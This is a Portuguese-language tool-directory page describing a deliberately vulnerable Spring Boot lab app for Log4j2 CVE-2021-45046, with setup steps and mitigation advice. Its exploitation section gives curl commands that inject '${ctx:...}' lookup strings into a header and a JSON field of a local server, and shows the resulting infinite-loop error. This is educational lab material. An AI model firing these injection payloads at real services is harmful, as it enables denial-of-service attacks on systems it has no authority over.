Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j2-CVE-2021-45046 — Aplicação web Spring Boot de exemplo vulnerável ao Log4j2 CVE-2021-45046, demonstrando injeção JNDI e exploração de loop infinito para testes educacionais de segurança. | Kitploit
Ferramentas/GitHubGitHub/pravin-pp/log4j2-cve-2021-45046
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubpravin-pp/log4j2-cve-2021-45046

log4j2-CVE-2021-45046

Aplicação web Spring Boot de exemplo vulnerável ao Log4j2 CVE-2021-45046, demonstrando injeção JNDI e exploração de loop infinito para testes educacionais de segurança.

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exemplo de aplicação vulnerável Log4j2 (CVE-2021-45046)

Versões Afetadas: todas as versões de 2.0-beta9 a 2.15.0

Esta aplicação é baseada em uma aplicação web Spring Boot vulnerável ao CVE-2021-45046

Ela utiliza Log4j 2.14.1 (através do spring-boot-starter-log4j2 2.6.1).

Executando a aplicação

Execute:

root@kitploit:~
Importe o projeto em uma IDE Java como um projeto Maven

Execute CVEMainApplication.java como uma aplicação Spring Boot.

Passos de exploração

  • Em seguida, acione o exploit usando:
root@kitploit:~
Para GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${ctx:apiVersion}'


Para requisição POST ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${ctx:clientRef}"
}'
  • Observe a saída mostrando loop infinito, no entanto, durante os testes não se constatou que esse DOS consome muitos recursos, pois esse loop infinito é identificado pelo programa e gera erro:
root@kitploit:~

${ctx:clientRef}2021-12-15 19:27:50,212 http-nio-8080-exec-1 ERROR Ocorreu uma exceção ao processar o Appender LogToConsole java.lang.IllegalStateException: Loop infinito na interpolação de propriedade de  ${ctx:clientRef}: ctx:clientRef
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	

Mitigação :

  • Log4j 2.16.0 corrige este problema ao remover suporte para padrões de busca de mensagens e desabilitar a funcionalidade JNDI por padrão
Baixar ferramenta